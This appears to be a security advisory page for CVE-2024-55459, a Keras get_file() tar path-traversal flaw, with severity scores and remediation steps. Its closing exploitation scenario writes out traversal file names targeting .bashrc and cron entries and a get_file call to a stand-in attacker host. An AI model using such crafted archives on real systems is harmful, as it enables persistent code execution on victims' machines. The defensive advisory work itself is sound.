CVE-2024-55459 — MEDIUM (CVSS 6.5) AI Security Vulnerability

Q: Is CVE-2024-55459 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-55459, increasing the risk of exploitation.

Q: How to fix CVE-2024-55459?

1. PATCH: No official fix available — monitor https://github.com/keras-team/keras for a release. Pin to a version prior to 3.7.0 if regression testing confirms it is unaffected, or fork with manual path sanitization. 2. WORKAROUND: Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction. 3. HARDEN: Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions. 4. VERIFY: Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash. 5. DETECT: Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools). 6. AUDIT: Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

Q: What systems are affected by CVE-2024-55459?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, MLOps CI/CD pipelines, developer workstations.

Q: What is the CVSS score for CVE-2024-55459?

CVE-2024-55459 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.15%.

CISO Take

Any ML pipeline using Keras's get_file() to download external archives is vulnerable to arbitrary file writes on the host system via a crafted tar file. No official patch exists — immediately audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments. Teams using Keras ≤3.7.0 in automated MLOps pipelines should treat this as an active supply chain risk to training infrastructure.

Risk Assessment

Medium severity in isolation, but elevated in AI/ML contexts where automated pipelines routinely download datasets and model weights from external sources without manual review. Exploitation is low complexity once a malicious archive is staged (classic tar-slip), but requires user or pipeline execution pointing to attacker-controlled URLs. No active exploitation observed (EPSS 0.00149), not in CISA KEV. Risk concentrates in developer workstations and CI/CD training pipelines; production inference endpoints are typically not affected unless they dynamically download artifacts.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
keras	pip	—	No patch
64.1K OpenSSF 7.0 1.5K dependents Pushed 7d ago 53% patched ~32d to patch Full package profile →
keras	pip	<= 3.7.0	No patch
64.1K OpenSSF 7.0 1.5K dependents Pushed 7d ago 53% patched ~32d to patch Full package profile →

Severity & Risk

CVSS 3.1

6.5 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 35% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Unchanged

C None

I High

A None

Recommended Action

6 steps

PATCH

No official fix available — monitor https://github.com/keras-team/keras for a release. Pin to a version prior to 3.7.0 if regression testing confirms it is unaffected, or fork with manual path sanitization.
WORKAROUND

Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction.
HARDEN

Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions.
VERIFY

Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash.
DETECT

Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools).
AUDIT

Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Framework Training Data AML.T0002.000 - Datasets AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0018.002 - Embed Malware

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.3 - AI supply chain

NIST AI RMF

MANAGE 2.2 - Mechanisms to investigate and address AI risks are in place

OWASP LLM Top 10

LLM03:2025 - Supply Chain

Frequently Asked Questions

What is CVE-2024-55459?

Any ML pipeline using Keras's get_file() to download external archives is vulnerable to arbitrary file writes on the host system via a crafted tar file. No official patch exists — immediately audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments. Teams using Keras ≤3.7.0 in automated MLOps pipelines should treat this as an active supply chain risk to training infrastructure.

Is CVE-2024-55459 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-55459, increasing the risk of exploitation.

How to fix CVE-2024-55459?

1. PATCH: No official fix available — monitor https://github.com/keras-team/keras for a release. Pin to a version prior to 3.7.0 if regression testing confirms it is unaffected, or fork with manual path sanitization. 2. WORKAROUND: Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction. 3. HARDEN: Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions. 4. VERIFY: Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash. 5. DETECT: Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools). 6. AUDIT: Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

What systems are affected by CVE-2024-55459?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, MLOps CI/CD pipelines, developer workstations.

What is the CVSS score for CVE-2024-55459?

CVE-2024-55459 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.15%.

Technical Details

NVD Description

An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.

Exploitation Scenario

An adversary crafts a malicious tar.gz archive where filenames embed path traversal sequences (e.g., ../../home/mluser/.bashrc or ../../../../etc/cron.d/gpu-job). The archive is hosted on an attacker-controlled server or injected into a compromised public dataset mirror. A data scientist or automated MLOps pipeline calls keras.utils.get_file(url='https://attacker-controlled-mirror.com/imagenet-subset.tar.gz', extract=True). Keras downloads and extracts the archive without sanitizing entry paths, silently writing attacker-controlled content to arbitrary filesystem locations. Depending on permissions, this overwrites Python startup scripts, authorized_keys, or cron entries — achieving persistent code execution on the ML training host with no further user interaction.